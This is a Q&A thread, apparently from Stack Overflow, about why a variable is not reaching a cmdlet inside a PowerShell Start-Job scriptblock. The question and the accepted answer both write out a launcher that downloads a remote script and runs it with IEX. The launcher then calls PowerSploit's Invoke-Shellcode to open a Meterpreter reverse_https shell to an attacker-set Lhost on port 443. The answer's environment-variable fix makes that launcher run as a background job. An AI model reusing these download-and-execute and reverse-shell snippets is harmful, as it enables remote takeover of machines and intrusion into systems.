# Parameter in ScriptBlock not expanding properly

Tags: powershell, start-job

```
$foo = @("string.here")

foreach ($num in $foo) {
    $s = { $WebClientObject = New-Object Net.WebClient
           IEX $WebClientObject.DownloadString('https://webserver/MyCommandlet.ps1')
           $temp = $args[0]
           MyCommandlet -Lhost "$temp"
           Write-Host "$temp"
         }

    $id = [System.Guid]::NewGuid()
    $jobs += $id   
    Start-Job -Name $id -ScriptBlock $s -args $num
}
```

Modified from [this](https://stackoverflow.com/questions/11973775/powershell-get-output-from-receive-job). **Edit**: removed unnecessary code for clarity.

`MyCommandlet` expects a variable (here `-Lhost $temp`) that is checked before being used (it should not be null or empty).

I am getting the following error message when trying to run the above script.

> Invoke-Shellcode : Cannot validate argument on parameter 'Lhost'. The argument is null or empty. Provide an argument that is not null or empty, and then try the command again.

---

**Edit**: `Invoke-Shellcode` is the original Commandlet, which I'm referencing as `MyCommandlet`. I didn't want to include the full code for security reasons (in case people would run the script themselves). For more details, see the code here
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1

The original ScriptBlock would be something like (see the $temp variable)

```
{
   $WebClientObject = New-Object Net.WebClient
   IEX $WebClientObject.DownloadString('PAYLOAD_URL')
   Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $temp -Lport 443 -Force
}
```

---

Essentially, the variable is not passed to my `MyCommandlet` properly, whereas `Write-Host $temp` returns a non-null value (which is correct) in the same context. I understand that variables are not passed to other ScriptBlock, especially if it runs in a new job, but because `Write-Host` is able to read the value properly inside the job, there is something else that I must have missed.

As suggested by some posts, I have tried the following alternatives:

- `...} -ArgumentList $temp` (after the ScriptBlock)
  http://powershell.org/wp/forums/topic/passing-parameter-to-start-job/
- `{param($temp) ...}` (at the beginning of the ScriptBlock)
- Using `Start-Job -ScriptBlock {...}` directly, instead of a variable for
  the ScriptBlock.  `[scriptblock]::Create(...)` to declare the
  ScriptBlock
- Using `Invoke-Command`, instead of `Start-Job` but not
  only it does not work either (albeit working slightly differently), I
  would like to stick with `Start-Job` if possible.
- I would like to avoid using Powershell V3.0 `$using:variable` feature. Plus, it did not work in the configuration I tried.

None of those worked for me.

Comment: Hi, have you tried declaring your variable in an initialization script for `Start-Job` ? Use `-InitializationScript $initScript` and declare in `$initScript`.

Comment: Is `Lhost` the real name for `variable`?

Comment: If that is the case, change `MyCommandlet -Argument "$temp"` to `MyCommandlet -Lhost $temp`

Comment: @sodawillow, no I haven't tried that. Will help propagating the variable to the commandlet I want to interact with ? It sounds like it's still gonna be referencing the variable somehow so I may hit the same problem.

Comment: @MathiasR.Jessen Yeah, that's it. I have tried sanitising my code but left out this part, so it's confusing. I have edited the code to reflect this. Eiher way, yes I have tried it. And it does not work :(

Comment: The code you posted doesn't match the error message. Also, you need to provide more context on `MyCommandlet`. The parameter snippet is too incomplete. Is the file you're downloading a script, or a function definition wrapped in a script? Where is the parameter defined? Please make the code in your question as self-contained as possible.

Comment: @AnsgarWiechers fair enough. Tried to improve clairty slightly.

Comment: I really think this is because of the way the specific commandlet I want to use works (`MyCommandlet` or `Invoke-Shellcode` that is). Maybe it does some weird stuff which I don't understand.

The variable $temp gets the right value inside the scriptBlock, and is definitely not null. Just the commandlet that is not able to read it for some reason.

Answer (score 0):

I found a solution that works, which relies on using environment variables, such as `$env:myvar`. To tie it up to the question above, I have used this way:

```
$foo = 'string_var'
$env:temp_var = $($foo)      

$s = { $WebClientObject = New-Object Net.WebClient
       IEX $WebClientObject.DownloadString('PAYLOAD_URL')
       Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $env:temp_var -Lport 443 -Force -Proxy
       #Write-Host $env:temp_var
     }

$id = [System.Guid]::NewGuid()
$jobs += $id   
Start-Job -Name $id -ScriptBlock $s

# Clean-up
Remove-Item env:\temp_var
```

For more details on environment variables in Powershell, see https://technet.microsoft.com/en-us/library/ff730964.aspx

**ps**: It still doesn't make sense to me why the options suggested above don't work... If anyone has any explanation, it would be most welcome.